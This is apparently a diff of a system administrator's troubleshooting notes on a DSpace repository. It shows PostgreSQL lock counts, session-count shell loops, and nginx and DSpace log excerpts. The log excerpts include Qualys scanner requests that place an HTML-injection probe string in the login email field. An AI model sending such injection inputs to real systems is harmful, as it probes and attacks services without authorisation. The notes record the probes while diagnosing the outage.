                                                                                                                                                                                                                                              Apr 06 07:52:13 linode18 tomcat7[556]: Apr 06, 2021 7:52:13 AM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                              • Around that time in the dspace log I see nothing unusual, but maybe these?
                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                              2021-04-06 07:52:29,409 INFO  com.atmire.dspace.cua.CUASolrLoggerServiceImpl @ Updating : 200/127 docs in http://localhost:8081/solr/statistics
                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                2021-04-06 07:52:29,409 INFO  com.atmire.dspace.cua.CUASolrLoggerServiceImpl @ Updating : 200/127 docs in http://localhost:8081/solr/statistics
                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                • (BTW what is the deal with the “200/127”? I should send a comment to Atmire) -
                                                                                                                                                                                                                                                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                  -3640
                                                                                                                                                                                                                                                  -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                  -2968
                                                                                                                                                                                                                                                  -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                  -13
                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                    +3640
                                                                                                                                                                                                                                                    +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                    +2968
                                                                                                                                                                                                                                                    +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                    +13
                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                    • After ten minutes or so it went back down…
                                                                                                                                                                                                                                                    • And now it’s back up in the thousands… I am seeing a lot of stuff in dspace log like this:
                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                    2021-04-06 11:59:34,364 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717951
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717952
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717953
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717954
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717955
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717956
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717957
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717958
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717959
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717960
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717961
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717962
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717963
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717964
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717965
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717966
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717967
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717968
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717969
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717970
                                                                                                                                                                                                                                                    -2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717971
                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                      2021-04-06 11:59:34,364 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717951
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717952
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717953
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717954
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717955
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717956
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717957
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717958
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717959
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717960
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717961
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717962
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717963
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717964
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717965
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717966
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717967
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717968
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717969
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717970
                                                                                                                                                                                                                                                      +2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717971
                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                      • I sent some notes and a log to Atmire on our existing issue about the database stuff
                                                                                                                                                                                                                                                        • Also I asked them about the possibility of doing a formal review of Hibernate
                                                                                                                                                                                                                                                        • @@ -354,65 +354,65 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                        • I had a meeting with Peter and Abenet about CGSpace TODOs
                                                                                                                                                                                                                                                        • CGSpace went down again and the PostgreSQL locks are through the roof:
                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                        $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                        -12154
                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                          $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                          +12154
                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                          • I don’t see any activity on REST API, but in the last four hours there have been 3,500 DSpace sessions:
                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                          # grep -a -E '2021-04-06 (13|14|15|16|17):' /home/cgspace.cgiar.org/log/dspace.log.2021-04-06 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
                                                                                                                                                                                                                                                          -3547
                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                            # grep -a -E '2021-04-06 (13|14|15|16|17):' /home/cgspace.cgiar.org/log/dspace.log.2021-04-06 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
                                                                                                                                                                                                                                                            +3547
                                                                                                                                                                                                                                                            +
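A single total can hide a short burst, so it may help to break the same count down by hour. The following is a minimal sketch, not part of the original notes: the function name `sessions_per_hour` is hypothetical, and it assumes every log line starts with a `YYYY-MM-DD HH:MM:SS` timestamp and carries a 32-character `session_id`, as in the excerpts above.

```shell
# Hypothetical helper: print the number of unique session IDs seen in each hour.
# Assumes lines look like "2021-04-06 11:59:34,365 INFO ... session_id=<32 chars>:..."
sessions_per_hour() {
    # Keep only the part of each line from the timestamp through the session ID
    grep -a -o -E '^[0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:.*session_id=[A-Z0-9]{32}' "$1" \
        | sed -E 's/^[0-9-]+ ([0-9]{2}):.*(session_id=[A-Z0-9]{32})$/\1 \2/' \
        | sort -u \
        | cut -d' ' -f1 \
        | uniq -c
}
```

Calling `sessions_per_hour /home/cgspace.cgiar.org/log/dspace.log.2021-04-06` would print one line per hour, with the count of distinct sessions followed by the hour.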
                                                                                                                                                                                                                                                            • I looked at the same time of day for the past few weeks and it seems to be a normal number of sessions:
                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                            # for file in /home/cgspace.cgiar.org/log/dspace.log.2021-0{3,4}-*; do grep -a -E "2021-0(3|4)-[0-9]{2} (13|14|15|16|17):" "$file" | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                            -...
                                                                                                                                                                                                                                                            -3572
                                                                                                                                                                                                                                                            -4085
                                                                                                                                                                                                                                                            -3476
                                                                                                                                                                                                                                                            -3128
                                                                                                                                                                                                                                                            -2949
                                                                                                                                                                                                                                                            -2016
                                                                                                                                                                                                                                                            -1839
                                                                                                                                                                                                                                                            -4513
                                                                                                                                                                                                                                                            -3463
                                                                                                                                                                                                                                                            -4425
                                                                                                                                                                                                                                                            -3328
                                                                                                                                                                                                                                                            -2783
                                                                                                                                                                                                                                                            -3898
                                                                                                                                                                                                                                                            -3848
                                                                                                                                                                                                                                                            -7799
                                                                                                                                                                                                                                                            -255
                                                                                                                                                                                                                                                            -534
                                                                                                                                                                                                                                                            -2755
                                                                                                                                                                                                                                                            -599
                                                                                                                                                                                                                                                            -4463
                                                                                                                                                                                                                                                            -3547
                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                              # for file in /home/cgspace.cgiar.org/log/dspace.log.2021-0{3,4}-*; do grep -a -E "2021-0(3|4)-[0-9]{2} (13|14|15|16|17):" "$file" | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                              +...
                                                                                                                                                                                                                                                              +3572
                                                                                                                                                                                                                                                              +4085
                                                                                                                                                                                                                                                              +3476
                                                                                                                                                                                                                                                              +3128
                                                                                                                                                                                                                                                              +2949
                                                                                                                                                                                                                                                              +2016
                                                                                                                                                                                                                                                              +1839
                                                                                                                                                                                                                                                              +4513
                                                                                                                                                                                                                                                              +3463
                                                                                                                                                                                                                                                              +4425
                                                                                                                                                                                                                                                              +3328
                                                                                                                                                                                                                                                              +2783
                                                                                                                                                                                                                                                              +3898
                                                                                                                                                                                                                                                              +3848
                                                                                                                                                                                                                                                              +7799
                                                                                                                                                                                                                                                              +255
                                                                                                                                                                                                                                                              +534
                                                                                                                                                                                                                                                              +2755
                                                                                                                                                                                                                                                              +599
                                                                                                                                                                                                                                                              +4463
                                                                                                                                                                                                                                                              +3547
                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                              • What about total number of sessions per day?
                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                              # for file in /home/cgspace.cgiar.org/log/dspace.log.2021-0{3,4}-*; do echo "$file:"; grep -a -o -E 'session_id=[A-Z0-9]{32}' "$file" | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-03-28:
                                                                                                                                                                                                                                                              -11784
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-03-29:
                                                                                                                                                                                                                                                              -15104
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-03-30:
                                                                                                                                                                                                                                                              -19396
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-03-31:
                                                                                                                                                                                                                                                              -32612
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-04-01:
                                                                                                                                                                                                                                                              -26037
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-04-02:
                                                                                                                                                                                                                                                              -14315
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-04-03:
                                                                                                                                                                                                                                                              -12530
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-04-04:
                                                                                                                                                                                                                                                              -13138
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-04-05:
                                                                                                                                                                                                                                                              -16756
                                                                                                                                                                                                                                                              -/home/cgspace.cgiar.org/log/dspace.log.2021-04-06:
                                                                                                                                                                                                                                                              -12343
                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                # for file in /home/cgspace.cgiar.org/log/dspace.log.2021-0{3,4}-*; do echo "$file:"; grep -a -o -E 'session_id=[A-Z0-9]{32}' "$file" | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-03-28:
                                                                                                                                                                                                                                                                +11784
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-03-29:
                                                                                                                                                                                                                                                                +15104
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-03-30:
                                                                                                                                                                                                                                                                +19396
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-03-31:
                                                                                                                                                                                                                                                                +32612
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-04-01:
                                                                                                                                                                                                                                                                +26037
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-04-02:
                                                                                                                                                                                                                                                                +14315
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-04-03:
                                                                                                                                                                                                                                                                +12530
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-04-04:
                                                                                                                                                                                                                                                                +13138
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-04-05:
                                                                                                                                                                                                                                                                +16756
                                                                                                                                                                                                                                                                +/home/cgspace.cgiar.org/log/dspace.log.2021-04-06:
                                                                                                                                                                                                                                                                +12343
                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                • So it’s not the number of sessions… it’s something with the workload…
                                                                                                                                                                                                                                                                • I had to step away for an hour or so and when I came back the site was still down and there were still 12,000 locks
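The two session counts above (unique sessions in an afternoon window, and unique sessions per day) follow the same pattern, so they can be folded into one small helper. This is only a sketch: the function name `count_sessions` and its optional filter argument are assumptions made for illustration, not something from the original commands. It relies only on the `session_id=` field format visible in the DSpace logs and on standard `grep`, `sort`, and `wc`.

```shell
# Hypothetical helper (not part of the original notes): count distinct
# DSpace session IDs in a single log file.
#   $1 = path to a dspace.log file
#   $2 = optional extended regex; only lines matching it are counted
#        (an empty pattern matches every line)
count_sessions() {
    grep -a -E -- "${2:-}" "$1" \
        | grep -o -E 'session_id=[A-Z0-9]{32}' \
        | sort -u \
        | wc -l
}

# Example usage (bash, paths as in the commands above):
#   for file in /home/cgspace.cgiar.org/log/dspace.log.2021-0{3,4}-*; do
#       echo "$file: $(count_sessions "$file")"
#       echo "$file (13:00-17:59): $(count_sessions "$file" '2021-0(3|4)-[0-9]{2} (13|14|15|16|17):')"
#   done
```

Using `sort -u` should give the same result as `sort | uniq` here, and keeping the time filter as an argument makes it easier to compare the afternoon window against the whole day for the same file.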
                                                                                                                                                                                                                                                                    @@ -421,13 +421,13 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                  • The locks in PostgreSQL shot up again…
                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                  -3447
                                                                                                                                                                                                                                                                  -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                  -3527
                                                                                                                                                                                                                                                                  -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                  -4582
                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                    +3447
                                                                                                                                                                                                                                                                    +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                    +3527
                                                                                                                                                                                                                                                                    +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                    +4582
                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                    • I don’t know what the hell is going on, but the PostgreSQL connections and locks are way higher than ever before:

                                                                                                                                                                                                                                                                    PostgreSQL connections week @@ -440,9 +440,9 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p

                                                                                                                                                                                                                                                                    • While looking at the nginx logs I see that MEL is trying to log into CGSpace’s REST API and delete items:
                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                    34.209.213.122 - - [06/Apr/2021:03:50:46 +0200] "POST /rest/login HTTP/1.1" 401 727 "-" "MEL"
                                                                                                                                                                                                                                                                    -34.209.213.122 - - [06/Apr/2021:03:50:48 +0200] "DELETE /rest/items/95f52bf1-f082-4e10-ad57-268a76ca18ec/metadata HTTP/1.1" 401 704 "-" "-"
                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                      34.209.213.122 - - [06/Apr/2021:03:50:46 +0200] "POST /rest/login HTTP/1.1" 401 727 "-" "MEL"
                                                                                                                                                                                                                                                                      +34.209.213.122 - - [06/Apr/2021:03:50:48 +0200] "DELETE /rest/items/95f52bf1-f082-4e10-ad57-268a76ca18ec/metadata HTTP/1.1" 401 704 "-" "-"
                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                      • I see a few of these per day going back several months
                                                                                                                                                                                                                                                                        • I sent a message to Salem and Enrico to ask if they know
                                                                                                                                                                                                                                                                        • @@ -450,13 +450,13 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                        • Also annoying, I see tons of what look like penetration testing requests from Qualys:
                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                        2021-04-04 06:35:17,889 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:no DN found for user "'><qss a=X158062356Y1_2Z>
                                                                                                                                                                                                                                                                        -2021-04-04 06:35:17,889 INFO  org.dspace.authenticate.PasswordAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:authenticate:attempting password auth of user="'><qss a=X158062356Y1_2Z>
                                                                                                                                                                                                                                                                        -2021-04-04 06:35:17,890 INFO  org.dspace.app.xmlui.utils.AuthenticationUtil @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:email="'><qss a=X158062356Y1_2Z>, realm=null, result=2
                                                                                                                                                                                                                                                                        -2021-04-04 06:35:18,145 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:auth:attempting trivial auth of user=was@qualys.com
                                                                                                                                                                                                                                                                        -2021-04-04 06:35:18,519 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:no DN found for user was@qualys.com
                                                                                                                                                                                                                                                                        -2021-04-04 06:35:18,520 INFO  org.dspace.authenticate.PasswordAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:authenticate:attempting password auth of user=was@qualys.com
                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                          2021-04-04 06:35:17,889 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:no DN found for user "'><qss a=X158062356Y1_2Z>
                                                                                                                                                                                                                                                                          +2021-04-04 06:35:17,889 INFO  org.dspace.authenticate.PasswordAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:authenticate:attempting password auth of user="'><qss a=X158062356Y1_2Z>
                                                                                                                                                                                                                                                                          +2021-04-04 06:35:17,890 INFO  org.dspace.app.xmlui.utils.AuthenticationUtil @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:email="'><qss a=X158062356Y1_2Z>, realm=null, result=2
                                                                                                                                                                                                                                                                          +2021-04-04 06:35:18,145 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:auth:attempting trivial auth of user=was@qualys.com
                                                                                                                                                                                                                                                                          +2021-04-04 06:35:18,519 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:no DN found for user was@qualys.com
                                                                                                                                                                                                                                                                          +2021-04-04 06:35:18,520 INFO  org.dspace.authenticate.PasswordAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:authenticate:attempting password auth of user=was@qualys.com
                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                          • I deleted the ilri/AReS repository on GitHub since we haven’t updated it in two years
                                                                                                                                                                                                                                                                            • All development is happening in https://github.com/ilri/openRXV now
                                                                                                                                                                                                                                                                            • @@ -464,38 +464,38 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                            • 10PM and the server is down again, with locks through the roof:
                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                            $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                            -12198
                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                              $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
